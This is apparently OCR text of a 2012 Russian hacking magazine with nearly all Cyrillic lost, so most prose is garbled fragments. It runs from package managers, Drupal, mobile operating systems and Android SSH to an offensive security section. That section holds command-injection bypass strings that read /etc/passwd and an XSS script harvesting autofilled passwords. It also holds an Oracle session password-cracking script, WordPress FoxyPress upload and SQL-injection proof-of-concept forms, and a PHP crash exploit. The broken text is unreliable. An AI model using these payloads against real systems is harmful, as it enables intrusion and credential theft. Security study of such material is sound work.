sourceforge.net/projects/fink
,
fink-0.34.4.tar.gz.
$ tar -xzf fink-0.34.4.tar.gz
$ cd fink-0.34.4
$ ./bootstrap
Java SDK,
SDK.
. Fink
,
/sw,
( ).

.
,

. , , , :).
'source
/sw/bin/init.sh' profile- bash_rc. .
ffmpeg
FinkCommander Fink

.

, Fink
CVS- :
$ fink selfupdate-cvs

. list.
.
qt
4.8.3
4.8.3
4.7.3
4.8.3
curl
7.28.0
7.28.0
7.28.0
7.28.0
wget
1.14
1.14
1.14
1.14
zsh
5.0.0
5.0.0
4.3.12
5.0.0
emacs
vim
tmux
24.2
24.2
23.4
24.2
7.3.712
7.3.661
7.3.709
7.3.709
1.7
1.7
1.6
1.7
ettercap
0.7.4.1
0.7.3
0.7.4
0.7.4.1
wireshark
1.8.3
1.8.3
1.8.3
1.8.3
wine
1.5.15
1.4.1
1.3.21
1.4.1
,
:
ImageMagick. ,
imagemagick.
, Fink
(
fink showdeps imagemagick)
, :
$ fink describe bash-completion
fink install imagemagick
. /sw
, Fink sudo. , ,

:
$ fink list completion
$ fink install bash-completion

$ echo 'source /sw/bin/init.sh' >>
~/.profile
,
,
$ echo 'source /sw/etc/bash_completion'

>> ~/.profile
044
Upstream MacPorts
,
Linux, Mac OS X,
Debian Ubuntu Mint.
fink
, .
, ,
,
. ,

,
( ) .
Homebrew
$ brew search completion
: mxcl.github.com/homebrew
: braumeister.org
: bit.ly/f99Dmj
( ): 2146
:
$ brew info bash-completion
:
Homebrew :
MacPorts driving you to drink? Try Homebrew!
.
( 2009 ).
Homebrew .

Ruby,
. ,
,
- .
Homebrew
,
. MacPorts
Fink , ,

Django, Sinatra,
Homebrew .
(gem pip),

. , , ,
, .
HOMEBREW
Fink MacPorts, Homebrew
/usr/local.
, sudo . ,
,
. ,
, UNIX
, ,
Homebrew
( ).
? ,
.
,
Homebrew , :
$ ruby -e "$(curl -fsSkL
raw.github.com/mxcl/homebrew/go)"
Homebrew.

.
:
12 /167/ 2012
$ brew install bash-completion
:
$ brew upgrade
:
$ brew uninstall bash-completion
-, , .
, Ruby. ,
,
, :
homepage
. ,
,
,
, ,
;
url ,
. , Homebrew
.
.
install,

.
APG
(Automated Password Generator).
, . :
require 'formula'
class Apg < Formula
homepage 'http://www.adel.nursat.kz/
apg/'
url 'http://www.adel.nursat.kz/apg/
download/apg-2.2.3.tar.gz'
sha1 '7bdbc931ef8477717186dc3ab3a2d
3c25012b4ca'
def install
system "make", "standalone",
"CC=#{ENV.cc}",
"FLAGS=#{ENV.cflags}",
"LIBS=", "LIBM="
bin.install 'apg', 'apgbfm'
man1.install 'doc/man/apg.1',
'doc/man/apgbfm.1'
end
end
-
,
, , ,
, .
edit :
$ brew edit apg
.

.

Homebrew . Ruby,
,
-
.

.

.
, , .

,
MacPorts Homebrew.
,

( ).
Homebrew
, ,
.
MacPorts ,
.
, ,
? z
045
PC ZONE
(iliamrv@ya.ru)
Drupal
DRUPAL ,

Drupal , ,
: , , , !
. , Drupal ,
. CMS.
Drupal
, ,
WordPress, , ,
Drupal .
,
, Drupal.

Drupal drag'n'drop (. Administration
Dashboard), , Clash'N Slash.
Toolbar & Shortcut (Configuration
User interface Shortcuts)
Dashboard.
Drupal:

.
, Administration menu
(is.gd/zKxQf4) ,
must-have
,
Drupal .
046
,
, Seven Rubik
(is.gd/ilXKK7) Fubik (is.gd/EtlGqr).
,

Plaintext (Configuration Content
authoring Text formats)

HTML- .
,
, Filtered HTML,
, HTML
(, - cross-site scripting)
:).
, WYSIWYG (is.gd/amicOp)
, (Configuration
Content authoring Wysiwyg profiles).
WYSIWYG
WYSIWYG . CKEditor
TinyMCE, -
: NicEdit . TinyMCE,

CMS. CKEditor,
Drupal .
. ,
, Drush:
is.gd/b4nj5d Windows;
is.gd/cAKSW2 UNIX / OS X.
, Drupal .
(node) ,
.
WYSIWYG Aloha
Editor (aloha-editor.org).
. -
Spark (drupal.
org/project/spark),
.
WYS(is not
always)WYG(but it can be) (is.gd/0SMRjp) ,
WYSIWYG Drupal.
12 /167/ 2012
Drupal
Manage Fields
WYSIWYG

, Drupal 7, ,
. Image

,
, . ,
,
.
Insert
(drupal.org/project/insert) WYSIWYG ,
Image Resize Filter (is.gd/Rn3eLv)

.
Image styles (Configuration
Media Image styles),
.
.
Administration Structure
Content Types Manage fields
File.
Allowed file extensions .

Number of values Unlimited. Enable insert button ,
Image styles.

(
WYSIWYG).

, Media (drupal.org/
project/media)
Field UI .
, MediaElement (is.gd/
lpst93) .
HTML5-
.

YouTube, .
Insert
Pathauto
12 /167/ 2012

, Reports

Drupal. ,
, , .
.
Modules , Statistics Syslog
.
, Topvisitors
,
( ),
IP IP Address blocking.
Recent log messages
, ,
( 404), .
, -5

:
( );
( );
( );
(,

);
xp (, 'xp' ).

Reports Status report,
.

. , Google Webmaster
Tools ,
Drupal .

WordPress
Akismet.
,
Drupal.
( Drupal
), :
, :).
Disqus
.
disqus.com,
Akismet.
,
, white- black.
,
.
:

Drupal: Configuration People
Account settings.
047
PC ZONE
Drupal
Drupal 7 : Bartik,
Seven Stark. ,
. Drupal 7
380 , .

. Drupal themes

, .

, Drupal ,
. Bartik, Garland,

Drupal 6. ,
.
Stark,
: Zen, Basic,
Omega . , 960Robots
960 grid, Twitter Bootstrap (drupal.org/
project/twitter_bootstrap)
. ,
Themes
Drupal.
HELLO WORLD

, PHP.
:

css\
css\style.css
page.tpl
node.tpl
screenshot.png
mytheme.info
CSS,

CSS-

150x90

mytheme.info.
mytheme.info
;
;
name = mytheme
;
description = Hello World
package = Core
; Drupal
version = VERSION
core = 7.x
; Stylesheets -
stylesheets[screen][] = css/style.css
; Scripts () - JS-
scripts[] = js/my.js
; Regions -
;
regions[content] = Content
regions[messages] = Messages
regions[page_top] = Page top
regions[page_bottom] = Page bottom
regions[sidebar_first] = First sidebar
, HTML-.
,
HTML , , index.html page.tpl.php .
page.tpl.php,
node.php.tpl.
,
page.tpl.php
/* ,
Stylesheets mytheme.info */
<?phpprint $styles; ?>
/* ,
Scripts mytheme.info */
<?phpprint $scripts; ?>
/* Content,
Regions */
<?php print render($page['content']); ?>
,
,
, Advanced
Theming.
HTML5,
HTML5 Tools
(drupal.org/project/html5_tools) ,
, , Modernizr

.
VIEWS
,
. ,
,
,
.
Drupal
.
,
(
).
Views. Views
(drupal.org/project/views)
,
, ,
Drupal. , ,
, , ,
. CCK Drupal.

Views. Structure Views , View Popular
content (Edit View).
, Sort Criteria
Content statistics: Total views
(desc). Fields.
CCK

, , .
, ( Calendar),
(Nivo Slider) .

,
Views.

.
PANELS
Views
( ), Panels (drupal.org/
project/panels) Views.
CSS HTML
drag'n'drop.
Contexts, .
DISPLAY SUITE
Display Suite (drupal.org/project/ds)
drag'n'drop. Display Suite
, ,
user friendly.
,
VIEWS.

048
12 /167/ 2012
Drupal
Drupal
, Drupal SEO-.
- , .
SEO Checklist (drupal.org/project/
seo_checklist),
(Ben Finklea),
Drupal 6 Search Engine Optimization.
-
SEO- Drupal. , -
Drupal, ,
.
,
drupalize.me.

.
, SEO
Checklist ( ).
:
,
. , , ,
, , ,
,
.
Metatags

, ,
. ,
.
.

Drupal Path
, . ,
?
. Pathauto (is.gd/b5bQ2k) ()
.
Drupal ,
Transliteration (is.gd/xIMJxm)
Transliterate prior to creating alias
Pathauto.
:
-
Bulk update, (
250 ).

XML sitemap XML , .
,
(Inclusion
Included)
. Cron
(Configuration System Cron).
Sitemap : www.sitemaps.
org/protocol.html.
GOOGLE
.

www.google.com/analytics/ (,
). , , Google Analytics (is.
gd/1C1Qbe) , .
,

Google Analytics Reports. Google Chart API,
Analytics. : is.gd/pZTEbe.
,

Analytics,
23 .

Drupal.

.

, ,
JavaScript.
Share Buttons (AddToAny) by Lockerz
(drupal.org/project/addtoany)
AddToAny share-
.
Twitter (drupal.org/project/twitter) Twitter.
Twitter,
Views. z
ADDON. 10 DRUPAL
Community Documentation (drupal.org/documentation) ,
, .
Drupal.ru , , Drupal.
Drupal Planet (drupal.org/planet) Drupal,
.
Books about Drupal (drupal.org/books) .
Drupal (,
CRM, ), .
Lullabot Podcast (www.lullabot.com/ideas/podcasts/lullabot-podcast)
.
Drupalize Me (drupalize.me) Drupal Lullabot.
.
Drupal Video Podcast (mustardseedmedia.com/podcast)
.
Xandeadx.ru , , Drupal.
, .
Learning library (nodeone.se/sv/learning-library) ,
Drupal.
Drupal TV (drupal-tv.ru) ,
.
Rubik
12 /167/ 2012
049
X-MOBILE
(androidstreet.ru)
MEEGO
TIZEN
WEBOS
FIREFOX OS
, Android, iOS, Windows Phone, Symbian. ,

,
, . .
App Store Google Play
,

,
.
?
, -?
,
.

, .

-.

- .
-? :

, ,
,
HTML5, CSS3, SVG
JavaScript. , ,

050
,
Java
Objective-C.
,
,
,
. HTML5
Windows 8 ( )
BlackBerry OS 10

.
.
?
MEEGO/MER
MeeGo ,

.
.

iOS Android
-
.
MeeGo
Intel Nokia,
(Moblin
INFO

Enyo
webOS,
iOS,
Android, BlackBerry,
Windows,

.

Intel MeeGo

,
oFono,
MeeGo, Tizen
Mer.
Maemo), Linux,
2010
.

MeeGo 1.0 Arlington,

Nokia N900,

.
MeeGo
, -
UNIX Linux.
-, MeeGo , Linux-,

,
.

,
Linux.
, Gstreamer, PulseAudio,
X-, QT
Linux-, Evolution Chromium.
MeeGo , ,
.
-, ,

,
-
12 /167/ 2012
Tizen ,
,
. API,
QT,

, (,
DE Linux).
,
MeeGo .
MeeGo Intel Nokia

( MeeGo
UX User Experiences): , , .
Nokia Intel
1.1 1.2 MeeGo, Microsoft Nokia
, MeeGo
Tizen.
MeeGo,
,
Nokia Samsung
, NEC Panasonic.
, MeeGo
, ,
, 2011

.
Mer,
MeeGo
Tizen. , ,
( ,
).

HTML5 , , Facebook Twitter. ,
- ,
. , ,
. Facebook ,
HTML5 , .
, HTML5 , Facebook
IPO, -.
- .
HTML5 . ,
iOS- Facebook, -
. , HTML , ,
, , .
12 /167/ 2012
Mer

,
,

. , Mer
,
Tizen,
,
Plasma Active KDE ( Vivaldi,
,
Mer).
Mer ,
Raspberry Pi, BeagleBoard, Nokia N900, Nokia
N950, Nokia N9 , Intel Atom. 2012
Jolla Mobile,
Nokia,
MeeGo,
, Mer.
2012 .
TIZEN
Nokia MeeGo Intel Samsung,
Linux Foundation LiMo
Tizen.
MeeGo
, HTML5 JavaScript.
WebOS,
, Tizen
, Linux
,
-, HTML,
JavaScript CSS.
. -
,

,
. , ,
-,

: API ,
.
-
, Tizen Native
Development Kit,
C
C++,
.
99% JavaScript , ( ,
, ) ,
/C++.
Tizen
2012 ,
-
051
X-MOBILE
webOS

. - ,
, Android
TouchWiz (
Samsung LiMo,
).
2.0 , , ,
,
API, HTML5/W3C ( , Tizen
Web API , W3C, WebRTC,
getUserMedia API, Vibration API )
WebKit2,

- .
,
Tizen

. ,
OpenMobile Application Compatibility
Layer, Tizen , Android (
,
MeeGo webOS).
,
2012 ,

- , , HTC, Acer
ASUS. ,
, ,
, Linux,
Android, .
, SDK Eclipse, ,
QEMU,
, Tizen API. , ,
,
JavaScript/HTML5, Linux-,

EFL (Enlightenment Foundation Libraries),
Linux- X-.
MeeGo,
, ConnMan,
Bluetooth- bluez,
Gstreamer, FFmpeg,
OpenSSL, -
WebKit JQuery Mobile 1.0.
MeeGo, Tizen ,
Nokia N9 MeeGo 1.2
052
WEBOS
, -,
webOS
, . WebOS
2009 Palm, Palm Pre,
,
Palm Pixi Pre2.
Palm
webOS,

. ,
,
webOS
;
,
2010 Hewlett-Packard.
IT-
,
webOS, HP
, .
HP webOS
, HP Veer HP Pre 3,
HP TouchPad,
Windows,
,
2012 .
TouchPad ,
.
,

, webOS,
HP 2011

. Enyo, webOS-,
12 /167/ 2012
Firefox OS
webOS
.
WebOS ( )
,
Linux.
.
,
,
. WebOS
,
.
webOS Linux,
, ,
MeeGo Tizen (
Palm
),

.
webOS Enyo.
Enyo (enyojs.com)
JavaScript-,
webOS
. , Enyo,
-:
HTML-, JavaScript
Enyo
. JS API,
,
D-Bus,

.
WebOS
Enyo. ,
WebKit HTML
CSS ( ),
C C++,

12 /167/ 2012
. Linux: ssh,
cp, vi, grep, find, diff, top, tar, gzip .
WebOS
,
, ,

, Google
Android
Palm .
FIREFOX OS
-

,
. 2009
Google
Chrome OS (Chromium
OS),
JS-. Mozilla

Android, , , IPC- Binder,
3D-, .
Gecko Gaia, HTML,
CSS -, W3C.
Firefox OS , -
API .
API ,

- Firefox OS,

.
,
Android
,
(
Android) ,
.
Firefox OS
/,
Otoro, PandaBoard, Emulator (ARM x86),
Desktop, Nexus S, Nexus S 4G, Samsung Galaxy
S II Galaxy Nexus. ,

, Android-, Motorola
Defy. Firefox OS

Telefonica, ZTE .
,

Firefox OS : ,
Android , ,
FIREFOX OS -
API

Google Chrome , (Gmail, YouTube, Last.fm ).
2011 Mozilla

Boot to Gecko (B2G), Linux
- Gecko.

Firefox OS.
Firefox OS Tizen webOS:
Linux,
-, JavaScript-
webOS Windows Phone,

.
,

. , ,

,
.
. z
053
X-MOBILE
(maks.hatchet@yandex.ru)
flickr.com/people/spaceabstract
ANDROID

, Android
, c ,
, . , ,

.
,
Android IT-
,
,
. -
( ,
) Linux, root ,
.
054
, SSH,
rsync
ADB,
. ,
, VPN-,
.

/.
,

, ,

.
root 80% ,

BusyBox SSH.
,

,
. , SuperOneClick
(shortfuse.org/?page_id=2), ,
.

## root,
( , ),

.
,
, BusyBox
Midnight Commander.
. Android
Terminal Emulator.
Hackers Keyboard,
,
,
12 /167/ 2012
$ adb shell
/ :
$ adb install .apk
$ adb uninstall .
( Linux):
$ for apk in *.apk; do adb install $apk;
done

:
$ adb push /sdcard
$ adb /sdcard/
:
$ adb logcat
ADB
BusyBox
<F1><F12>, <Ctrl> ,

. AirTerm,

. (~120 ), .
,
Linux- .
Android
,

(, top,
). BusyBox,
. Google Play
.
, root Install
.

Midnight
Commander, , , ,
/
SSH ADB.
MC Google Play,
(30 ),
XDA: goo.gl/nDpfa.
,
Install.
ADB (Android Debug Bridge), Android

SDK , ,
,
.
, Android
ADB
USB-, ,
, .
Android
ADB , Android- WiFi
ADB, ADB-
( ,
ADB
).
, Android
ADB,
,
Turn On,
Android SDK,
platform-tools . (
):
SSH, ADB OVER WI-FI

12 /167/ 2012
$ adb connect 192.168.0.102:5555

: connected to 192.168.0.102:5555.
. ,
, , ,
Linux- MC:
ADB ,
:
( ).
,
,
SSH.
Android
SSH-,
root,
( SSH- CyanogenMod),
SSHDroid , . ,
, Start
SSH- , Address: (
sftp://). SSH-:
$ ssh root@192.168.0.2
,
SSHDroid
admin,
. ,
,
Password
Login banner.
,
RSA- (
*nix-):
$ yes | ssh-keygen
~/.ssh/id_rsa.
pub
SSHDroid Authorized
keys (
055
X-MOBILE
),
Enable password .
,
,
ConnectBot.
.
_@IP
.

.

, ConnectBot
. ,
, . ,
()
(
, 1024- RSA- ),
.
,
. ConnectBot

,
, ,
, ,
~/.ssh/authorized_keys
UNIX/Linux
SSH- Windows
Mac OS.
,
, .
Google Play
,
SSH.
SSHFSAndroid (80 ),
,
SSH.
sshfs, Linux FUSE ( ,
Android 2.2;
FUSE Android
).
SSHFSAndroid
. , +
.
, +
: Name
, Host IP (,
192.168.0.100), Remote path (, /home/
vasya), Mount point
(/sdcard/share), Username
Password .
(
) ,
SSH
056
,
.

.
, ,
, .

, . ,

sshfs,
Advanced options . .
Android
,
(, Dropbox, Google Drive),
Windows Mac OS X. -
,
IT- ,
rsync
. UNIX-
,
, rsync ,
SSH.
rsync,

.
rsync
.
(
) SSH, rsync,

rsync backup for Android
Google Play.
rsync
(,
/sdcard ),
.
, rsync
backup, ,
Get binaries,
rsync.
,
Generate keys.

.
Gmail
Dropbox.
~/.ssh/
authorized_keys
, Windows Mac OS.
12 /167/ 2012

;
3G-.
SSH-

, Add
profile.
: Profile name ,
Local file or directory
( /sdcard
), Username , Server IP
, Dropbear SSH private key ,
, /sdcard/dss_key,
Remote file or directory
(, ~/backup).
Save profile,
, .
, .

, rsync
Tasker,
. Tasker ,
.
, , ,
VPN-.
Android ,
, .

-,
, . Android ,
ProxyDroid, :
HTTP/HTTPS/
SOCKS4/SOCKS5-;
NTLM/NTLMv2-;
VPN
VPN.

.
Wi-Fi-, -,
, , -
12 /167/ 2012
,
/
.
ProxyDroid Linux netfilter/iptables,
root .
root , , , ,
netfilter .
ProxyDroid .

-,
/.
.
, ;

.
,

.
VPN Android
,
, 4.0, . OpenVPN .
: OpenVPN
Installer,
Install, OpenVPN Settings,
VPN-.

VPN ( ) /sdcard/openvpn,
OpenVPN.

, Android,
. z
INFO

Android , SysV, systemd init-.
, , . ,
,
sh. CyanogenMod, AOKP MIUI
, /system/etc/init.d,
.
init.d , , EZ
InitD (goo.gl/YrhIi) .
XDA: goo.gl/gqpgb.
root
Opera
Mobile opera:config, Firefox

ProxyMob.
WiFi ADB

Tasker
ADB,

.
CyanogenMod

ADB

( ).
057
/ EASY HACK
GreenDog , Digital Security (twitter.com/antyurin)
EASY
HACK

... :). .
,
OS Command Injection. ,
.
, win . .
, , - , .
, - XSS,
- . .
.
- .
, , . ping 127.0.0.1
ping127.0.0.1. ?
, .
, , goo.gl/Y53lh.
. , , ,
. ,
:
.
, %programfiles%,
C:\Program Files, , :~10,1, 10- .
, substring . . ,
set /? .
, *nix,
bash:
cat${LESSOPEN:11:1}/etc/passwd
cat$IFS/etc/passwd
$IFS Internal Field Separator, , . (

).
ping%programfiles:~10,1%127.0.0.1
, , , . ping ,
(substring)
058
12 /167/ 2012
$LESSOPEN less.
| /usr/bin/lesspipe %s.
Bash goo.gl/ZthC6.
, , ,
- . . -,
. -,
.
,
. , %programfiles
C:\Programme.

JAVASCRIPT
- , . , XSS. - XSS
. .
XSS
,
. ? -,
, .
.
. .
, XSS :
. .
.
, . ,
( - ). ,
, .
, , . XSS JavaScript,
,
. ,
.
? .
goo.gl/ALUL5, . (Ben Toews) IE, FF, Chrome
LastPass.
( ).
. FF, Chrome,
LastPass , , , .
sub.example.org mail.example.org
. SOP . , (path) .
example.org/login.php example.org/news.
php. ,
, .
IE ,
. ,
. :
//1
function attack() {
ex_username = document.getElementById('username').
value;
ex_password = document.getElementById('password').
value;
if (ex_username != '' | ex_password != '') {
12 /167/ 2012
alert("username=" + ex_username + "&password=" +

ex_password);
}
}
//2
document.write("\
<form method='post' action='index.php'>
username:<input type='text' name='username'
id='username' value='' autocomplete='on'><br>
password:<input type='password' name='password'
id='password' value='' autocomplete='on'><br>
<input type='submit' name='login' value='Log In'>
</form>
");
//3
inter = window.setInterval("attack()", 100);
. 2
XSS HTML,
. , . 3
1 0,1 . , , .
goo.gl/Oqzb7. IE, ,
,
. , ,
() , JS XSS. ,
, JS,
,
.
, , , . , ,
,
.
, .
,
XSS
059
/ EASY HACK
- IIS
,

IIS , , . -
, ,
. ,
.

Windows.
, ,
.
, 8.3 filename (SFN short filename)
,

.
Microsoft MS-DOS
FAT16.
: command.com, cmd.exe, calc.exe :).
VFAT
(LFN, long filename),
.
, ,
8.3, .
LFN SFN:
1. LFN 8.3, . , LFN
, SFN.
2. LFN
8.3, . : TextFile.Txt TEXTFILE.TXT.
3. LFN 8.3 /
(, ), ,
( _). LFN.
(~), -,
.: ver() +1.2.text VER_12~1.TEX.
- ,
, LFN
. : TextFile1.Mine.txt TEXTFI~1.TXT, TextFile3.AAAA.txt TEXTFI~2.TXT. , ,
Microsoft backward-compatibility,
(Win2008, Win7)
SFN. ,
dir /x (dir /-n), SFN LFN (.
1). , .
. (Soroush
Dalili) IIS
(goo.gl/wDCNc).
wildchar * ? ,
. ,

( SFN) LFN .
, .NET
aspx ( LFN),
. , ,

,
. 2,
. .
. IIS validlong.extx,
8.3 VALIDL~1.EXT.
060
1. SFN C:\ Win7
2. IIS -

3. /
12 /167/ 2012
/valid*~1*/.aspx ,
IIS HTTP 404 File not found.
HTTP 400 Bad Request.
IIS. ,
/.aspx ,
.NET ( ),
.
, ,
?, ( urlencoding %3F).
, ,
,
. ,
. Java (goo.gl/
gCAA0), URL .
.
goo.gl/qhevO. sdl.me.
? , ,

.
, urlrewritting
( /
) . ,
.NET framework 4,
- .

? ,
- IIS
ASP.NET, .

/ ,
-, ,
:). , ,
.
- IIS
.
- impact . Easy
Hack ,
:).
IIS
.NET. ~1 - -,
.NET
-. . ,
.
, , ,
, -, , ; -,
~1. :
http://example.com/fake~1/~1/~1/~1/~1/~1/~1/~1/~1/~1.aspx.
-,
:
, (,
http://example.com/aA~1.AsPx).
, , .
.
, , , ,
.
.NET framework.
NTLM-
- .
.
, , ,
. -, . , . NTLM ,
. NTLM :
1. , .
2. 16-
challenge.
3. challenge (, )
.
12 /167/ 2012
4. ,
.
NTLMv2 ,
LM NTLMv1 ,
. , , , / , NTLM
, ,
NTLM relay. , SMB relay NTLM relay.
, ,
NTLM,
,
.
NTLMv2 .
061
Server Side
Telnet
L2TP
PPTP MPPE
HTTP(S)
POP3
SMTP
RDP
SIP
LDAP
Client Side
IMAP
FTP
RADIUS
SMB/CIFS
MS-RPC
+ +
+ +
MS MP
MS SQL
MS-RPC/HTTP
MS-RPC
SMB/CIFS
RADIUS
FTP
LDAP
SIP
RDP
IMAP
SMTP
POP3
HTTP(S)
PPTP MPPE
Telnet
NTLM,
.

!
L2TP
/ EASY HACK

.
, SMB

WARNING
INFO

. ,

,

.
MS-RPC/HTTP
MS SQL
MS MP
, SMB relay NTLM relay.

, Microsoft NTLM-
! POP3, HTTP, FTP, Telnet
( ). , , ,
! HTTP2SMB SMB2SMB .
, . -, . , SMB
. . -,
NTLM. -,
. , ,
NTLM,
(SMB, HTTP).
. , ,
, . :
NTLM Kerberos
:).
( SMB-). , . NTLM-
, : (HTTP/HTTPS),
- (HTTP/HTTPS), (IMAP, POP3, SMTP),
(MSSQL) .
,
( ), - .
, SMB relay, /
/ - .
,
- .
062
,
.
NTLM ,

. , - NTLM, -
.
. , ,
,
-
- .
. Metasploit
http_ntlmrelay, HTTP
HTTP SMB. ( , ),
. -,
NTLMv2 ( NTLMv1 ). ,
. ,
antiCSRF-
. -,
, . ,
.

goo.gl/4qDll. ,
. , :). .
!
12 /167/ 2012
(ivinside.blogspot.com)
WARNING

. ,
,
.

,
.
.
Oracle Database
CVSSV2
6.4 MEDIUM
(AV:N/AC:L/AU:N/C:P/I:P/A:N)
BRIEF
Oracle
.
.
(Esteban Martinez
Fayo) Ekoparty security conference,
-. ,
Oracle 2010 . Oracle
2011-, .
2012- ,
.
.
.
, + . ,
,
88888888 -, ,
. ,
-
EXPLOIT
.
.
064
Oracle
12 /167/ 2012
, .
:
Invision
Power Board
CVSSV2
import hashlib
from Crypto.Cipher import AES
10.0 HIGH
(AV:N/AC:L/AU:N/C:C/I:C/A:C )
BRIEF
def decrypt(session, salt, password):
pass_hash = hashlib.sha1(password + salt)
# 24
key = pass_hash.digest() + '\x00\x00\x00\x00'
decryptor = AES.new(key, AES.MODE_CBC)
plain = decryptor.decrypt(session)
return plain
# 48
session_hex = 'EA2043CB8B46E3864311C68BDC161F8
CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5
422553A7598143E78767'

(Egidio Romano aka EgiX)
Invision Power Board, PHP- .
:
21.10.2012 ;
23.10.2012 ;
25.10.2012 : goo.gl/xoatp;
25.10.2012 CVE ;
29.10.2012 CVE-2012-5692;
31.10.2012 .
EXPLOIT
# 10
salt_hex = 'A7193E546377EC56639E'
IPSCookie::get()
/admin/sources/base/core.php ( 4015 ):
#
passwords = ['test', 'password', 'oracle', 'demo']
static public
function get($name) {
if (isset(self::$_cookiesSet[$name])) {
return self::$_cookiesSet[$name];
} else if (isset($_COOKIE[ipsRegistry::$settings
['cookie_id'].$name])) {
$_value = $_COOKIE[ipsRegistry::$settings
['cookie_id'].$name];
if (substr($_value, 0, 2) == 'a: ') {
return unserialize(stripslashes(urldecode
($_value)));
}
for password in passwords:

#
session_id = decrypt(session_hex.decode('hex'),
salt_hex.decode('hex'), password)
print 'Decrypted session_id for password "%s"
is %s' % (password, session_id.encode('hex'))
#
# 88888888,
if session_id[40:] == '\x08\x08\x08\x08\x08':
print 'PASSWORD IS "%s"' % password
break

session_hex salt_hex, Wireshark. ,
,
( ),
.
TARGETS
Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2

11.2.0.3.
unserialize,

.
a:, , PHP.
,
.
PHP- __destruct() dbMain,
, , writeDebugLog
-. PHP
$_SERVER['QUERY_STRING'], short_open_
tag. : goo.gl/OO4Mc.
TARGETS
SOLUTION
Oracle goo.gl/PWTYo.
, :
1. 10g,
.
2. sqlnet.ora SQLNET.ALLOWED_LOGON_VERSION=12,
.
3. SSL
.
4. , ,
.
.
12 /167/ 2012
Invision Power Board 3.1.2 3.3.1.

SOLUTION
WordPress
FoxyPress Plugin
CVSSV2
6.5
(AV:N/AC:L/AU:S/C:P/I:P/A:N)
BRIEF
WordPress. (Janek Vind

waraxe).
.
065
/
- -.
.
goo.gl/Ljnzr.
EXPLOIT
documenthandler.php.
.
. :
if (!empty($_FILES)) {
...
$targetpath = ABSPATH.INVENTORY_DL_LOCAL_DIR;
...
$newfilename = foxypress_GenerateNewFileName
($fileExtension, $inventory_id,
$targetpath, $prefix);
$targetpath = $targetpath.$newfilename;
if (move_uploaded_file($_FILES['Filedata']
['tmp_name'], $targetpath))
, ,
, .
. PHP RCE (
). . :
http://localhost/wp342/wp-admin/post.php?
post=43&action=edit
Digital Downloads.
Browse Files. PHP-,
. ,
:
http://localhost/wp342/wp-content/
inventory_downloadables/my_download_jw82ku0jz9_43.php
.
SQL- documenthandler.php. .
. , 14:
if (!empty($_FILES)) {
$inventory_id = intval( $_POST['inventory_id'] );
$downloadabletable = $_POST['prefix'];
...
$query = "INSERT INTO " . $downloadabletable
. " SET inventory_id='"
. $inventory_id . "', filename='"
. mysql_escape_string($newfilename)
... ,

066
Oracle
. "', maxdownloads= '"

. mysql_escape_string($downloadablemaxdownloads)
. "', status = 1";
$wpdb->query($query);
, POST 'prefix' SQL "INSERT INTO"

. ,

.
:
<html>
<body>
<center>
<form action="http://localhost/wp342/wp-admin/
admin-ajax.php?action=foxypressdownload&security=
844b64ce45" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name=
"downloadablemaxdownloads" value="1">
<input type="hidden" name="prefix" value="waraxe">
<input type="submit" value="Test">
</form>
</center>
</body>
</html>
SQL- foxypress-manage-emails.php.
, GET- id.

.
foxypress-manage-emails.php, 14- :
function foxypress_manage_emails_page_load()
{
global $wpdb;
if(isset($_GET['mode']) && $_GET['mode']=='edit')
{
if(isset($_POST['foxy_em_save']))
{
12/167/ 2012
...
$sql = "UPDATE ". $wpdb->prefix .
"foxypress_email_templates set
foxy_email_template_name='".$templatename."',
foxy_email_template_subject='".$subject."',
foxy_email_template_email_body='".$content."',
foxy_email_template_from='" . $from . "'
WHERE email_template_id=".$_GET[id];
UPDATE wp_foxypress_email_templates
set foxy_email_template_name='2',
foxy_email_template_subject='3',
foxy_email_template_email_body='',
foxy_email_template_from=''
WHERE email_template_id=waraxe
TARGETS
WordPress FoxyPress Plugin 0.4.2.5.

:
SOLUTION
<html>
<body>
<center>
<form action="http://localhost/wp342/wp-admin/
edit.php?post_type=foxypress_product&page=
manage-emails&mode=edit&id=waraxe" method="post">
<input type="hidden" name="foxy_em_save" value="1">
<input type="hidden" name="templatename" value="2">
<input type="hidden" name="subject" value="3">
<input type="submit" value="Test">
</form>
</center>
</body>
</html>
(
0.4.2.7).
PHP
5.3.4 Win Com Module Com_sink
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
BRIEF
Com_sink, COM .NET Windows.

, .
EXPLOIT
WordPress database error:

[Unknown column 'waraxe' in 'where clause']
.
Internet Explorer Google:
12 /167/ 2012
067
/
*** ERROR: Symbol file could not be found. Defaulted to
export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll
- php5ts!php_strftime+0xadc:
102f59bd 8b06
mov
eax,dword ptr [esi]
ds:0023:43434343=????????
102f59bf
102f59c2
102f59c3
102f59c4
102f59c5
102f59c6
8d4dd4
51
53
53
56
ff5010
lea
push
push
push
push
call
ecx,[ebp-2Ch]
ecx
ebx
ebx
esi
dword ptr [eax+10h]
MessageBox PHP 5.3.4 Win Com Module Com_sink
EIP:
<?php
class IEEventSinker {
var $terminated = false;
<?php
$eip ="\x44\x43\x42\x41";
//$eip= "\x4b\xe8\x57\x78"; jmp edi
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);
function ProgressChange($progress, $progressmax) {

echo "Download progress: $progress $progressmax\n";
}
function DocumentComplete(&$dom, $url) {
echo "Document $url complete\n";
}
function OnQuit() {
echo "Quit!\n";
$this->terminated = true;
}
}
$ie = new COM("InternetExplorer.Application");
$sink = new IEEventSinker();
com_event_sink($ie, $sink, "DWebBrowserEvents2");
$ie->Visible = true;
$ie->Navigate("http://www.google.com");
while(!$sink->terminated) {
com_message_pump(4000);
}
$ie = null;
?>
com_event_sink COM-, .
,
. ,
Access Violation:
<?php
$buffer = str_repeat("B", 1000);
$vVar = new VARIANT(0x43434343);
$vVar2 = new VARIANT(0x41414141);
com_event_sink($vVar, $vVar2 , $buffer );
?>
Access Violation:
(310.1fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any
exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00372ad0 edx=0114dd88
esi=43434343 edi=0114d9b8 eip=102f59bd esp=00c1f988
ebp=00c1f9dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
068
